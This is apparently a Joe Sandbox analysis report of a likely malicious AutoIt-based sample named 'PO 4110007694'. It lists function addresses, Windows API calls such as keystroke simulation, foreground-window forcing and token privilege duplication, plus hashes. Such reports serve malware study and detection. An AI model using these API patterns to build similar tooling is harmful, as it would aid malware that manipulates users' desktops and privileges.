                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                    • String ID:
                                                                    • API String ID: 1396898556-0
                                                                    • Opcode ID: 33665428c7dc19dab9976f21bb865ffc9fed13809a78aa3f012f6d3daa088bf5
                                                                    • Instruction ID: 731630fd8f92daf5d632e2583c3635d0b49ff1c672157aa852c2981855462b54
                                                                    • Opcode Fuzzy Hash: 33665428c7dc19dab9976f21bb865ffc9fed13809a78aa3f012f6d3daa088bf5
                                                                    • Instruction Fuzzy Hash: B911E331600205ABCF18FF70C816FEEB7A9AF45710F10882DF542E7181DA719A41BB91
                                                                    Function 00C4FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: a4c46ca5ce662e43840734c0ea2a40f8e045ed3ad7764eecf16a3fd486350091
                                                                    • Instruction ID: 873e9b79e75c50c9133a5501eb7d409dcd6015df53d7da78c92140e0048fee59
                                                                    • Opcode Fuzzy Hash: a4c46ca5ce662e43840734c0ea2a40f8e045ed3ad7764eecf16a3fd486350091
                                                                    • Instruction Fuzzy Hash: 9C2155B4608301DFCB14DF24C454B5ABBE1BF89314F15886CF89A87722D731E849EB92
                                                                    Function 00C34863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00C348A6
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 7431f17f5eefbc7ffaeb1a581597cb945b98019d3e1d767f528bf5654bb87d16
                                                                    • Instruction ID: 18909f41d6f33deae71141aeb0a92df86907a23f59e01c44ee651a72bac60ec2
                                                                    • Opcode Fuzzy Hash: 7431f17f5eefbc7ffaeb1a581597cb945b98019d3e1d767f528bf5654bb87d16
                                                                    • Instruction Fuzzy Hash: B5F0CD31921709EBDF15AFB4CC067EE36A0EF01329F158418F424EA1D1CBB89A55EF92
                                                                    Function 00C14E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: b14040078d43567fe94897caa5f910b4b1e1f5bce0b253c235faa3aae0ccf30e
                                                                    • Instruction ID: 4e6377be110e0a6cd690a77189f7dd797b02404f3f73ff0b207ae1a1b0492d1b
                                                                    • Opcode Fuzzy Hash: b14040078d43567fe94897caa5f910b4b1e1f5bce0b253c235faa3aae0ccf30e
                                                                    • Instruction Fuzzy Hash: 75F03075501711CFCB389F65E494856FBE1BF15325310893EE1E682620C7319880EF80
                                                                    Function 00C30791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_memmove
                                                                    • String ID:
                                                                    • API String ID: 2514874351-0
                                                                    • Opcode ID: c37a2d640d928be705ec836ec6fac1dc11916c0c103cb2a5d6d10632154f69d2
                                                                    • Instruction ID: 3e117bb9e2d2563923512c394ae670ac06dbb257d2a3c6a49fafe9ffb848df66
                                                                    • Opcode Fuzzy Hash: c37a2d640d928be705ec836ec6fac1dc11916c0c103cb2a5d6d10632154f69d2
                                                                    • Instruction Fuzzy Hash: C4E0CD3690412857C720D6599C05FEA77EDDF897A0F0841B6FC0CD7205D9609CC096D0
                                                                    Function 00C3525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction ID: 09f452629cc55e77dcd581e9b2518bfa190a673cf9f64e3d2c5508c4cb295323
                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction Fuzzy Hash: F2B0927644020C7BCE012A82EC02A4A3B199B41764F408020FB0C18162A673E664AA89
                                                                    Function 017E0F8C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 017E0FA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 84b372b037baf2811f83e219ba41010dec1fc50b0faf5b8d27237e93b8adef64
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: E2E09A7494420DAFDB00EFA4D54969EBBB4EF04301F1005A5FD0596681DB709E648A62
                                                                    Function 017E0F90 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 017E0FA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: ef4197b25e9a4ca857e2dee77ae11054ff8ce9ee2af7d28a1fcc736d445835b0
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: DAE0BF7494420D9FDB00EFA4D54969EBBF4EF04301F100165FD0192281D6709D608A62

                                                                    Non-executed Functions

                                                                    Function 00C9CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C9CB37
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CB95
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C9CBD6
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CC00
                                                                    • SendMessageW.USER32 ref: 00C9CC29
                                                                    • _wcsncpy.LIBCMT ref: 00C9CC95
                                                                    • GetKeyState.USER32(00000011), ref: 00C9CCB6
                                                                    • GetKeyState.USER32(00000009), ref: 00C9CCC3
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CCD9
                                                                    • GetKeyState.USER32(00000010), ref: 00C9CCE3
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CD0C
                                                                    • SendMessageW.USER32 ref: 00C9CD33
                                                                    • SendMessageW.USER32(?,00001030,?,00C9B348), ref: 00C9CE37
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C9CE4D
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C9CE60
                                                                    • SetCapture.USER32(?), ref: 00C9CE69
                                                                    • ClientToScreen.USER32(?,?), ref: 00C9CECE
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C9CEDB
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C9CEF5
                                                                    • ReleaseCapture.USER32 ref: 00C9CF00
                                                                    • GetCursorPos.USER32(?), ref: 00C9CF3A
                                                                    • ScreenToClient.USER32(?,?), ref: 00C9CF47
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9CFA3
                                                                    • SendMessageW.USER32 ref: 00C9CFD1
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D00E
                                                                    • SendMessageW.USER32 ref: 00C9D03D
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C9D05E
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C9D06D
                                                                    • GetCursorPos.USER32(?), ref: 00C9D08D
                                                                    • ScreenToClient.USER32(?,?), ref: 00C9D09A
                                                                    • GetParent.USER32(?), ref: 00C9D0BA
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9D123
                                                                    • SendMessageW.USER32 ref: 00C9D154
                                                                    • ClientToScreen.USER32(?,?), ref: 00C9D1B2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C9D1E2
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D20C
                                                                    • SendMessageW.USER32 ref: 00C9D22F
                                                                    • ClientToScreen.USER32(?,?), ref: 00C9D281
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C9D2B5
                                                                      • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C9D351
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3977979337-4164748364
                                                                    • Opcode ID: 242ec7f88829f2d4dfddb0c51ad016edd6c41964f054d48126c707d007da9e7f
                                                                    • Instruction ID: d80700e1270451c32d106ff00ec9ef442d7a25fd949a56f823bf5974c0732737
                                                                    • Opcode Fuzzy Hash: 242ec7f88829f2d4dfddb0c51ad016edd6c41964f054d48126c707d007da9e7f
                                                                    • Instruction Fuzzy Hash: 44428974204281AFDB20CF24C888BAABBE5FF49350F14055EF6A6D72B1C731D951EB52
                                                                    Function 00C97DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C984D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 3850602802-328681919
                                                                    • Opcode ID: f5f87b99def8df1f3be55a1917c8a04aa5600a034c0b367c7fb871f5e54819a1
                                                                    • Instruction ID: bd9643cb87dfe8747ad5e72010455e6dae6f700c326c57f32d06e6c18193d68e
                                                                    • Opcode Fuzzy Hash: f5f87b99def8df1f3be55a1917c8a04aa5600a034c0b367c7fb871f5e54819a1
                                                                    • Instruction Fuzzy Hash: B812AC71500209ABEF259F65CC4DFAE7BB8EF46310F20416AF915EB2E1DB709A45DB10
                                                                    Function 00C26F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_memset
                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                    • API String ID: 1357608183-1798697756
                                                                    • Opcode ID: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
                                                                    • Instruction ID: 3fb9ba030af071a5dcdb016f63b5607a2684a86837d883f94440849b9610ec54
                                                                    • Opcode Fuzzy Hash: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
                                                                    • Instruction Fuzzy Hash: E193BF75E04229DFDB24CF98D8C1BADB7B1FF48310F24816AE955AB281E7709E81DB50
                                                                    Function 00C148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00C148DF
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4D665
                                                                    • IsIconic.USER32(?), ref: 00C4D66E
                                                                    • ShowWindow.USER32(?,00000009), ref: 00C4D67B
                                                                    • SetForegroundWindow.USER32(?), ref: 00C4D685
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4D69B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C4D6A2
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4D6AE
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6BF
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6C7
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C4D6CF
                                                                    • SetForegroundWindow.USER32(?), ref: 00C4D6D2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6E7
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D6F2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6FC
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D701
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D70A
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D70F
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D719
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D71E
                                                                    • SetForegroundWindow.USER32(?), ref: 00C4D721
                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00C4D748
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
                                                                    • Instruction ID: 637dd5f2b0f1fb5717d33f81949e4e4367dd7ee13056f5f412911b798871c5c9
                                                                    • Opcode Fuzzy Hash: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
                                                                    • Instruction Fuzzy Hash: 1A314571A40318BBEB216F619C49F7F7F6CEB44B50F11402AFA05EA1D1C6B05D51AAA1
                                                                    Function 00C68310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                      • Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                      • Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865
                                                                    • _memset.LIBCMT ref: 00C68353
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C683A5
                                                                    • CloseHandle.KERNEL32(?), ref: 00C683B6
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C683CD
                                                                    • GetProcessWindowStation.USER32 ref: 00C683E6
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00C683F0
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C6840A
                                                                      • Part of subcall function 00C681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
                                                                      • Part of subcall function 00C681CB: CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: bdf3dadcb2996f842804185662ce19d364a7d992b5d7277e913651bbb5f7730e
                                                                    • Instruction ID: a78d187e49eb4bc22b7acc0cb93f85ca13b1ba189baea2d834f832702a81105d
                                                                    • Opcode Fuzzy Hash: bdf3dadcb2996f842804185662ce19d364a7d992b5d7277e913651bbb5f7730e
                                                                    • Instruction Fuzzy Hash: AB814071900209AFDF21DFA4DC89BEE7B79FF04304F14426AF925A6161DB318E19EB20
                                                                    Function 00C7C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C7C78D
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7C7E1
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C806
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C81D
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C844
                                                                    • __swprintf.LIBCMT ref: 00C7C890
                                                                    • __swprintf.LIBCMT ref: 00C7C8D3
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • __swprintf.LIBCMT ref: 00C7C927
                                                                      • Part of subcall function 00C33698: __woutput_l.LIBCMT ref: 00C336F1
                                                                    • __swprintf.LIBCMT ref: 00C7C975
                                                                      • Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C33713
                                                                      • Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C3372B
                                                                    • __swprintf.LIBCMT ref: 00C7C9C4
                                                                    • __swprintf.LIBCMT ref: 00C7CA13
                                                                    • __swprintf.LIBCMT ref: 00C7CA62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 3953360268-2428617273
                                                                    • Opcode ID: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
                                                                    • Instruction ID: 12b66028afbc954a169018646fb708e696d260a35c2c9fad8e0f359d6224f6f7
                                                                    • Opcode Fuzzy Hash: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
                                                                    • Instruction Fuzzy Hash: FCA14BB1408245ABC700EFA4C896EEFB7ECFF85700F40492DF595C6191EA30DA49EB62
                                                                    Function 00C7EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C7EFB6
